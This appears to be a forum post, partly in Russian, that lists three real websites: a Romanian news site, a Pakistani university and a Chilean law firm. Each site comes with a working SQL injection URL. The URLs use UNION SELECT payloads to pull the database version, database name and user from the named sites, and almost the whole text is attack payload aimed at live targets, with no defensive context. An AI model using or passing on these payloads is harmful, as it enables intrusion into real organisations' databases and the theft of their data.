http://www.gibas.ro/news.php?view=news&id=-46+union+select+1,version(),3,4,5,6,7,8--&language=en

Bahauddin Zakariya University, Multan, Pakistan. (https://www.bzu.edu.pk/news.php?cid=-5+union+select+1,version(),database(),4,5,6,7--#)


Code:
https://www.bzu.edu.pk/news.php?cid=-5+union+select+1,version(),database(),4,5,6,7--

Чилийская адвокатская контора:


Code:
http://www.menayguijon.cl/detalle_b.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,database(),user(),version()),16,17--